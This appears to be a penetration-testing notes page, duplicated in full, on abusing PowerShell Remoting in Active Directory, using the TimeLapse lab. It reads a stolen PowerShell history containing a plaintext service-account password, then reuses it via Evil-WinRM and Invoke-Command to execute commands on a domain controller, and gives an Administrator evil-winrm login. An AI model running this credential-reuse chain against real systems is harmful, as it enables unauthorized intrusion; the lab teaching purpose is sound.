PS-Remoting

PreviousGenericWrite GPO NextLAPS Password Read

Last updated 2 years ago

PS-Remoting

There is two ways in which we can PSRemote into a system, usually after invoking SharpHound we would be able to see that some users have this right.

In the picture above, we can see that both current owned users are able to PS-Remote into the Domain Controller. This means that with a valid password we can use the following chain of commands to execute code.

So in the case of TimeLapse we had a Powershell text history that allowed us to get the password who was able to PS-Remote into the system.

In the text file we found the following text:

*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

So in theory if we pass the same commands we would be able to execute the commands as the user svc_deploy.

Chain of commands.

*Evil-WinRM* PS C:\Users> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)

Now executing commands via PS-Remoting.

*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {hostname}
dc01

Evil-WInRM

We can use -S to specify PS-Remoting.

evil-winrm -u 'Administrator' -p '8p4Uc,AC5lJ9E]P9X7#3$10@' -i 10.10.11.152  -S

PoweView

Enter-PSSession -ComputerName <computer-name> -Credential user\domain

PreviousGenericWrite GPO NextLAPS Password Read

Last updated 2 years ago

There is two ways in which we can PSRemote into a system, usually after invoking SharpHound we would be able to see that some users have this right.

So in the case of TimeLapse we had a Powershell text history that allowed us to get the password who was able to PS-Remote into the system.

In the text file we found the following text:

*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

So in theory if we pass the same commands we would be able to execute the commands as the user svc_deploy.

Chain of commands.

*Evil-WinRM* PS C:\Users> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)

Now executing commands via PS-Remoting.

*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {hostname}
dc01

Evil-WInRM

We can use -S to specify PS-Remoting.

evil-winrm -u 'Administrator' -p '8p4Uc,AC5lJ9E]P9X7#3$10@' -i 10.10.11.152  -S

PoweView

Enter-PSSession -ComputerName <computer-name> -Credential user\domain